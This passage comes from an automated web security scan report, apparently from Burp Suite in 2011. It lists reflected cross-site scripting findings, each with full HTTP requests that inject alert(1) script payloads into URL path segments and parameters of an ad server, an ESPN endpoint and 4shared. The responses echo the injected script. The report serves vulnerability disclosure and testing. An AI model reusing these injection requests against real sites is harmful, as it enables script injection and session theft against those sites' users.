GET /2/ZapTrader/ATT/Wired613f7"><script>alert(1)</script>691cdb4b46f/Pros-UVerseOpt/All/12cd8346d-f045-42c9-88fc-dcc60b1aceb1@x90 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW801b0RcADNFE; RMFM=011PphRBU10Dzy; ATTW=TrafficMarketplaceB3; other_20110126=set; id=3375925924; dlx_XXX=set

Response

HTTP/1.1 200 OK
Date: Wed, 23 Feb 2011 21:38:34 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 396
Content-Type: text/html
Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09499e2045525d5f4f58455e445a4a423660;path=/

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/ZapTrader/ATT/Wired613f7"><script>alert(1)</script>691cdb4b46f/Pros-UVerseOpt/All/12cd8346d-f045-42c9-88fc-dcc60b1aceb1/1916158065/x90/default/empty.gif/726348573830316230526341444e4645?x" target="_top">
...[SNIP]...

1.57. http://b3.mookie1.com/2/ZapTrader/ATT/Wired/Pros-UVerseOpt/All/12cd8346d-f045-42c9-88fc-dcc60b1aceb1@x90 [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/ZapTrader/ATT/Wired/Pros-UVerseOpt/All/12cd8346d-f045-42c9-88fc-dcc60b1aceb1@x90

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 13275"><script>alert(1)</script>f4b4f57d27c was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/ZapTrader/ATT/Wired/Pros-UVerseOpt13275"><script>alert(1)</script>f4b4f57d27c/All/12cd8346d-f045-42c9-88fc-dcc60b1aceb1@x90 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW801b0RcADNFE; RMFM=011PphRBU10Dzy; ATTW=TrafficMarketplaceB3; other_20110126=set; id=3375925924; dlx_XXX=set

Response

HTTP/1.1 200 OK
Date: Wed, 23 Feb 2011 21:38:36 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 396
Content-Type: text/html
Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09499e2545525d5f4f58455e445a4a423660;path=/

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/ZapTrader/ATT/Wired/Pros-UVerseOpt13275"><script>alert(1)</script>f4b4f57d27c/All/12cd8346d-f045-42c9-88fc-dcc60b1aceb1/1957067333/x90/default/empty.gif/726348573830316230526341444e4645?x" target="_top">
...[SNIP]...

1.58. http://b3.mookie1.com/2/ZapTrader/ATT/Wired/Pros-UVerseOpt/All/12cd8346d-f045-42c9-88fc-dcc60b1aceb1@x90 [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/ZapTrader/ATT/Wired/Pros-UVerseOpt/All/12cd8346d-f045-42c9-88fc-dcc60b1aceb1@x90

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8a923"><script>alert(1)</script>f5c014234ec was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/ZapTrader/ATT/Wired/Pros-UVerseOpt/All8a923"><script>alert(1)</script>f5c014234ec/12cd8346d-f045-42c9-88fc-dcc60b1aceb1@x90 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW801b0RcADNFE; RMFM=011PphRBU10Dzy; ATTW=TrafficMarketplaceB3; other_20110126=set; id=3375925924; dlx_XXX=set

Response

HTTP/1.1 200 OK
Date: Wed, 23 Feb 2011 21:38:38 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 396
Content-Type: text/html
Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09499e2445525d5f4f58455e445a4a423660;path=/

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/ZapTrader/ATT/Wired/Pros-UVerseOpt/All8a923"><script>alert(1)</script>f5c014234ec/12cd8346d-f045-42c9-88fc-dcc60b1aceb1/1788008593/x90/default/empty.gif/726348573830316230526341444e4645?x" target="_top">
...[SNIP]...

1.59. http://b3.mookie1.com/2/ZapTrader/ATT/Wired/Pros-UVerseOpt/All/12cd8346d-f045-42c9-88fc-dcc60b1aceb1@x90 [REST URL parameter 7]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/ZapTrader/ATT/Wired/Pros-UVerseOpt/All/12cd8346d-f045-42c9-88fc-dcc60b1aceb1@x90

Issue detail

The value of REST URL parameter 7 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6db6d"><script>alert(1)</script>442dc3bf57f was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/ZapTrader/ATT/Wired/Pros-UVerseOpt/All/12cd8346d-f045-42c9-88fc-dcc60b1aceb1@x906db6d"><script>alert(1)</script>442dc3bf57f HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW801b0RcADNFE; RMFM=011PphRBU10Dzy; ATTW=TrafficMarketplaceB3; other_20110126=set; id=3375925924; dlx_XXX=set

Response

HTTP/1.1 200 OK
Date: Wed, 23 Feb 2011 21:38:40 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 388
Content-Type: text/html
Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09499e6f45525d5f4f58455e445a4a423660;path=/

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/ZapTrader/ATT/Wired/Pros-UVerseOpt/All/12cd8346d-f045-42c9-88fc-dcc60b1aceb1/1700368715/x906db6d"><script>alert(1)</script>442dc3bf57f/default/empty.gif/726348573830316230526341444e4645?x" target="_top">
...[SNIP]...

1.60. http://b3.mookie1.com/2/ZapTrader/ATT/Wired/Pros-UVerseOpt/All/1b5458553-7549-414b-83d2-2100a7556d38@x90 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/ZapTrader/ATT/Wired/Pros-UVerseOpt/All/1b5458553-7549-414b-83d2-2100a7556d38@x90

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 90e08"><script>alert(1)</script>3abd5a56497 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/ZapTrader90e08"><script>alert(1)</script>3abd5a56497/ATT/Wired/Pros-UVerseOpt/All/1b5458553-7549-414b-83d2-2100a7556d38@x90 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-9046165571664830&format=300x250_as&output=html&h=250&w=300&lmt=1298518211&channel=6075235820&ad_type=text_image&color_bg=FFFFFF&color_border=CCCCCC&color_link=085192&color_text=FFFFFF&color_url=085192&flash=10.2.154&url=http%3A%2F%2Fwww.komonews.com%2F&dt=1298497084466&shv=r20101117&jsv=r20110208&saldr=1&correlator=1298497083221&frm=0&adk=3789798029&ga_vid=758392942.1298497003&ga_sid=1298497003&ga_hid=1880891390&ga_fc=1&u_tz=-360&u_his=1&u_java=1&u_h=768&u_w=1364&u_ah=724&u_aw=1364&u_cd=16&u_nplug=9&u_nmime=44&biw=1210&bih=642&fu=0&ifi=2&dtd=112&xpc=8M0zeeSKPz&p=http%3A//www.komonews.com
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW801b0RcADNFE; RMFM=011PphRBU10Dzy; ATTW=TrafficMarketplaceB3; other_20110126=set; id=3375925924; dlx_XXX=set; NSC_o4efm_qppm_iuuq=ffffffff09499e6e45525d5f4f58455e445a4a423660; ATTWired=ZapTrader

Response

HTTP/1.1 200 OK
Date: Wed, 23 Feb 2011 21:38:36 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 396
Content-Type: text/html

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/ZapTrader90e08"><script>alert(1)</script>3abd5a56497/ATT/Wired/Pros-UVerseOpt/All/1b5458553-7549-414b-83d2-2100a7556d38/1010444679/x90/default/empty.gif/726348573830316230526341444e4645?x" target="_top">
...[SNIP]...

1.61. http://b3.mookie1.com/2/ZapTrader/ATT/Wired/Pros-UVerseOpt/All/1b5458553-7549-414b-83d2-2100a7556d38@x90 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/ZapTrader/ATT/Wired/Pros-UVerseOpt/All/1b5458553-7549-414b-83d2-2100a7556d38@x90

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c89d7"><script>alert(1)</script>b488108a356 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/ZapTrader/ATTc89d7"><script>alert(1)</script>b488108a356/Wired/Pros-UVerseOpt/All/1b5458553-7549-414b-83d2-2100a7556d38@x90 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-9046165571664830&format=300x250_as&output=html&h=250&w=300&lmt=1298518211&channel=6075235820&ad_type=text_image&color_bg=FFFFFF&color_border=CCCCCC&color_link=085192&color_text=FFFFFF&color_url=085192&flash=10.2.154&url=http%3A%2F%2Fwww.komonews.com%2F&dt=1298497084466&shv=r20101117&jsv=r20110208&saldr=1&correlator=1298497083221&frm=0&adk=3789798029&ga_vid=758392942.1298497003&ga_sid=1298497003&ga_hid=1880891390&ga_fc=1&u_tz=-360&u_his=1&u_java=1&u_h=768&u_w=1364&u_ah=724&u_aw=1364&u_cd=16&u_nplug=9&u_nmime=44&biw=1210&bih=642&fu=0&ifi=2&dtd=112&xpc=8M0zeeSKPz&p=http%3A//www.komonews.com
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW801b0RcADNFE; RMFM=011PphRBU10Dzy; ATTW=TrafficMarketplaceB3; other_20110126=set; id=3375925924; dlx_XXX=set; NSC_o4efm_qppm_iuuq=ffffffff09499e6e45525d5f4f58455e445a4a423660; ATTWired=ZapTrader

Response

HTTP/1.1 200 OK
Date: Wed, 23 Feb 2011 21:38:38 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 396
Content-Type: text/html

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/ZapTrader/ATTc89d7"><script>alert(1)</script>b488108a356/Wired/Pros-UVerseOpt/All/1b5458553-7549-414b-83d2-2100a7556d38/1088251137/x90/default/empty.gif/726348573830316230526341444e4645?x" target="_top">
...[SNIP]...

1.62. http://b3.mookie1.com/2/ZapTrader/ATT/Wired/Pros-UVerseOpt/All/1b5458553-7549-414b-83d2-2100a7556d38@x90 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/ZapTrader/ATT/Wired/Pros-UVerseOpt/All/1b5458553-7549-414b-83d2-2100a7556d38@x90

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 97a9a"><script>alert(1)</script>244d439e350 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/ZapTrader/ATT/Wired97a9a"><script>alert(1)</script>244d439e350/Pros-UVerseOpt/All/1b5458553-7549-414b-83d2-2100a7556d38@x90 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-9046165571664830&format=300x250_as&output=html&h=250&w=300&lmt=1298518211&channel=6075235820&ad_type=text_image&color_bg=FFFFFF&color_border=CCCCCC&color_link=085192&color_text=FFFFFF&color_url=085192&flash=10.2.154&url=http%3A%2F%2Fwww.komonews.com%2F&dt=1298497084466&shv=r20101117&jsv=r20110208&saldr=1&correlator=1298497083221&frm=0&adk=3789798029&ga_vid=758392942.1298497003&ga_sid=1298497003&ga_hid=1880891390&ga_fc=1&u_tz=-360&u_his=1&u_java=1&u_h=768&u_w=1364&u_ah=724&u_aw=1364&u_cd=16&u_nplug=9&u_nmime=44&biw=1210&bih=642&fu=0&ifi=2&dtd=112&xpc=8M0zeeSKPz&p=http%3A//www.komonews.com
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW801b0RcADNFE; RMFM=011PphRBU10Dzy; ATTW=TrafficMarketplaceB3; other_20110126=set; id=3375925924; dlx_XXX=set; NSC_o4efm_qppm_iuuq=ffffffff09499e6e45525d5f4f58455e445a4a423660; ATTWired=ZapTrader

Response

HTTP/1.1 200 OK
Date: Wed, 23 Feb 2011 21:38:40 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 395
Content-Type: text/html

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/ZapTrader/ATT/Wired97a9a"><script>alert(1)</script>244d439e350/Pros-UVerseOpt/All/1b5458553-7549-414b-83d2-2100a7556d38/384162992/x90/default/empty.gif/726348573830316230526341444e4645?x" target="_top">
...[SNIP]...

1.63. http://b3.mookie1.com/2/ZapTrader/ATT/Wired/Pros-UVerseOpt/All/1b5458553-7549-414b-83d2-2100a7556d38@x90 [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/ZapTrader/ATT/Wired/Pros-UVerseOpt/All/1b5458553-7549-414b-83d2-2100a7556d38@x90

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 314f5"><script>alert(1)</script>c812b72dfc2 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/ZapTrader/ATT/Wired/Pros-UVerseOpt314f5"><script>alert(1)</script>c812b72dfc2/All/1b5458553-7549-414b-83d2-2100a7556d38@x90 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-9046165571664830&format=300x250_as&output=html&h=250&w=300&lmt=1298518211&channel=6075235820&ad_type=text_image&color_bg=FFFFFF&color_border=CCCCCC&color_link=085192&color_text=FFFFFF&color_url=085192&flash=10.2.154&url=http%3A%2F%2Fwww.komonews.com%2F&dt=1298497084466&shv=r20101117&jsv=r20110208&saldr=1&correlator=1298497083221&frm=0&adk=3789798029&ga_vid=758392942.1298497003&ga_sid=1298497003&ga_hid=1880891390&ga_fc=1&u_tz=-360&u_his=1&u_java=1&u_h=768&u_w=1364&u_ah=724&u_aw=1364&u_cd=16&u_nplug=9&u_nmime=44&biw=1210&bih=642&fu=0&ifi=2&dtd=112&xpc=8M0zeeSKPz&p=http%3A//www.komonews.com
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW801b0RcADNFE; RMFM=011PphRBU10Dzy; ATTW=TrafficMarketplaceB3; other_20110126=set; id=3375925924; dlx_XXX=set; NSC_o4efm_qppm_iuuq=ffffffff09499e6e45525d5f4f58455e445a4a423660; ATTWired=ZapTrader

Response

HTTP/1.1 200 OK
Date: Wed, 23 Feb 2011 21:38:42 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 395
Content-Type: text/html

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/ZapTrader/ATT/Wired/Pros-UVerseOpt314f5"><script>alert(1)</script>c812b72dfc2/All/1b5458553-7549-414b-83d2-2100a7556d38/636339535/x90/default/empty.gif/726348573830316230526341444e4645?x" target="_top">
...[SNIP]...

1.64. http://b3.mookie1.com/2/ZapTrader/ATT/Wired/Pros-UVerseOpt/All/1b5458553-7549-414b-83d2-2100a7556d38@x90 [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/ZapTrader/ATT/Wired/Pros-UVerseOpt/All/1b5458553-7549-414b-83d2-2100a7556d38@x90

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6c314"><script>alert(1)</script>d3932d3a3a7 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/ZapTrader/ATT/Wired/Pros-UVerseOpt/All6c314"><script>alert(1)</script>d3932d3a3a7/1b5458553-7549-414b-83d2-2100a7556d38@x90 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-9046165571664830&format=300x250_as&output=html&h=250&w=300&lmt=1298518211&channel=6075235820&ad_type=text_image&color_bg=FFFFFF&color_border=CCCCCC&color_link=085192&color_text=FFFFFF&color_url=085192&flash=10.2.154&url=http%3A%2F%2Fwww.komonews.com%2F&dt=1298497084466&shv=r20101117&jsv=r20110208&saldr=1&correlator=1298497083221&frm=0&adk=3789798029&ga_vid=758392942.1298497003&ga_sid=1298497003&ga_hid=1880891390&ga_fc=1&u_tz=-360&u_his=1&u_java=1&u_h=768&u_w=1364&u_ah=724&u_aw=1364&u_cd=16&u_nplug=9&u_nmime=44&biw=1210&bih=642&fu=0&ifi=2&dtd=112&xpc=8M0zeeSKPz&p=http%3A//www.komonews.com
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW801b0RcADNFE; RMFM=011PphRBU10Dzy; ATTW=TrafficMarketplaceB3; other_20110126=set; id=3375925924; dlx_XXX=set; NSC_o4efm_qppm_iuuq=ffffffff09499e6e45525d5f4f58455e445a4a423660; ATTWired=ZapTrader

Response

HTTP/1.1 200 OK
Date: Wed, 23 Feb 2011 21:38:44 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 395
Content-Type: text/html

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/ZapTrader/ATT/Wired/Pros-UVerseOpt/All6c314"><script>alert(1)</script>d3932d3a3a7/1b5458553-7549-414b-83d2-2100a7556d38/503112095/x90/default/empty.gif/726348573830316230526341444e4645?x" target="_top">
...[SNIP]...

1.65. http://b3.mookie1.com/2/ZapTrader/ATT/Wired/Pros-UVerseOpt/All/1b5458553-7549-414b-83d2-2100a7556d38@x90 [REST URL parameter 7]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/ZapTrader/ATT/Wired/Pros-UVerseOpt/All/1b5458553-7549-414b-83d2-2100a7556d38@x90

Issue detail

The value of REST URL parameter 7 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ebaa7"><script>alert(1)</script>878d79ae95a was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/ZapTrader/ATT/Wired/Pros-UVerseOpt/All/1b5458553-7549-414b-83d2-2100a7556d38@x90ebaa7"><script>alert(1)</script>878d79ae95a HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-9046165571664830&format=300x250_as&output=html&h=250&w=300&lmt=1298518211&channel=6075235820&ad_type=text_image&color_bg=FFFFFF&color_border=CCCCCC&color_link=085192&color_text=FFFFFF&color_url=085192&flash=10.2.154&url=http%3A%2F%2Fwww.komonews.com%2F&dt=1298497084466&shv=r20101117&jsv=r20110208&saldr=1&correlator=1298497083221&frm=0&adk=3789798029&ga_vid=758392942.1298497003&ga_sid=1298497003&ga_hid=1880891390&ga_fc=1&u_tz=-360&u_his=1&u_java=1&u_h=768&u_w=1364&u_ah=724&u_aw=1364&u_cd=16&u_nplug=9&u_nmime=44&biw=1210&bih=642&fu=0&ifi=2&dtd=112&xpc=8M0zeeSKPz&p=http%3A//www.komonews.com
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW801b0RcADNFE; RMFM=011PphRBU10Dzy; ATTW=TrafficMarketplaceB3; other_20110126=set; id=3375925924; dlx_XXX=set; NSC_o4efm_qppm_iuuq=ffffffff09499e6e45525d5f4f58455e445a4a423660; ATTWired=ZapTrader

Response

HTTP/1.1 200 OK
Date: Wed, 23 Feb 2011 21:38:47 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 387
Content-Type: text/html

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/ZapTrader/ATT/Wired/Pros-UVerseOpt/All/1b5458553-7549-414b-83d2-2100a7556d38/377266009/x90ebaa7"><script>alert(1)</script>878d79ae95a/default/empty.gif/726348573830316230526341444e4645?x" target="_top">
...[SNIP]...

1.66. http://broadband.espn.go.com/espn3/auth/espnnetworks/user [callback parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://broadband.espn.go.com
Path:   /espn3/auth/espnnetworks/user

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 4d851<script>alert(1)</script>bb63329db8 was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /espn3/auth/espnnetworks/user?callback=jsonp12984973704964d851<script>alert(1)</script>bb63329db8 HTTP/1.1
Host: broadband.espn.go.com
Proxy-Connection: keep-alive
Referer: http://espn.go.com/new-york/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SWID=EEF93A7D-3488-4FA5-8C21-135C0F4819BF; DE2=dXNhO3R4O2RhbGxhczticm9hZGJhbmQ7NTs0OzM7NjIzOzAzMi43ODc7LTA5Ni43OTk7ODQwOzQ0Ozc3OzY7dXM7; userAB=F

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Connection: Keep-Alive
Content-Length: 104
Content-Type: text/html; charset=iso-8859-1
Server: barista/3.3.6
Via: 8810-09/10

jsonp12984973704964d851<script>alert(1)</script>bb63329db8(
{ "espn3":"invalid", "networks":"invalid" })

1.67. http://dc305.4shared.com/main/upload.jsp [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://dc305.4shared.com
Path:   /main/upload.jsp

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b49ee"-alert(1)-"5c431f0ee83 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /mainb49ee"-alert(1)-"5c431f0ee83/upload.jsp HTTP/1.1
Host: dc305.4shared.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 /mainb49ee&quot;-alert(1)-&quot;5c431f0ee83/upload.jsp
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Thu, 24 Feb 2011 19:45:53 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:null-->
<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://dc305.4shared.com/mainb49ee"-alert(1)-"5c431f0ee83/upload.jsp";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {

...[SNIP]...

1.68. http://dc305.4shared.com/main/upload.jsp [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://dc305.4shared.com
Path:   /main/upload.jsp

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a85e5"-alert(1)-"9824e0eb5f7 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

